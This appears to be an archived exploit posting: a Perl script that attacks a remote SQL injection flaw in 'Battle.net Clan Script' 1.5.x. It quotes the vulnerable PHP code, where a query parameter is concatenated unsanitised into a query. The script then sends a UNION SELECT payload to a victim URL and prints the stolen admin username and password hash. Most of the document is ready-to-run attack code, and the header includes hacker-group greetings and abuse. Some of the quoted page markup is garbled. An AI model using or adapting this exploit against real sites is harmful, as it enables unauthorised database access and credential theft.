#!/usr/bin/perl -w # download script : http://sourceforge.net/project/showfiles.php?group_id=142506&package_id=156487 ############################################################## # Battle.net Clan Script <= 1.5.x - Remote SQL Inj Exploit # ############################################################## ######################################## #[*] Founded by : Stack-Terrorist [v40] #[*] Contact: Ev!L #[*] Greetz : Houssamix & All muslims HaCkeRs :) #[*] Fuck : JosS :@ ######################################## # vulnerable page ######################################## # #

# #div> #

# #

Members

# # # # # # # # ' . "\n"; } ## else { echo '' . "\n"; } # echo '' . "\n"; # echo '' . "\n"; ## if($email === '') { echo '' . "\n"; } # else { echo '' . "\n"; } # echo '' . "\n"; # echo '' . "\n"; # $alt = $alt + 1; #} #?> #

Rank	Member Name	Email	Date Joined
' . $rank . '	' . $name . '	n/a	Email	' . date("F d, Y", strtotime($date)) . '

# #

Member Details

# # # # # # # # # ' . $r["rank"] . '' . "\n"; # echo '' . "\n"; # if($r["email"] === '') { echo '' . "\n"; } # else { echo '' . "\n"; } # echo '' . "\n"; # ?> # #

Rank	Member Name	Email	Date Joined
' . $r["name"] . '	n/a	Email	' . date("F d, Y", strtotime($r["date"])) . '

#
#

Medals

# # # # # # # # ' . "\n"; } # else { echo '' . "\n"; } # echo '' . "\n"; # echo "\n"; # echo "\n"; # echo "\n"; # $alt = $alt + 1; #}?> # #

Medal	Medal Name	Description
	" . $name . "	" . $desc . "

# \n"; # echo "

Recruited

\n"; # $result = mysql_query("SELECT bcs_members.name FROM bcs_members, (SELECT id FROM bcs_members WHERE name = '" . $_GET['showmember'] . "') AS results " # . "WHERE results.id = bcs_members.recruit") or die(mysql_error()); # while($r=mysql_fetch_array($result)) # { # echo $r["name"] . "
\n"; # } # } # ?> #

#*/ #----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------# system("color a"); print "\t\t############################################################\n\n"; print "\t\t# Battle.net Clan Script <= 1.5.x - Remote SQL Inj Exploit #\n\n"; print "\t\t# by Stack-Terrorist [v40] #\n\n"; print "\t\t############################################################\n\n"; use LWP::UserAgent; die "Example: perl $0 http://victim.com/\n" unless @ARGV; system("color f"); #the username of joomla $user="name"; #the pasword of joomla $pass="password"; #the tables of joomla $tab="bcs_members"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $ARGV[0] . "/?page=members&showmember=-1'%20union%20select%20".$pass.",user(),44,".$user."+from+".$tab."+where+id=1/*"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~ /(.*?)<\/td>/){ print "\nBrought to you by v4-team.com...\n"; print "\n[+] Admin User : $1"; } if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n"; print "\t\t# Exploit has ben aported user and password hash #\n\n";} else{print "\n[-] Exploit Failed...\n";} # exploit exploited by Stack-Terrorist # milw0rm.com [2008-05-12]

Query Builder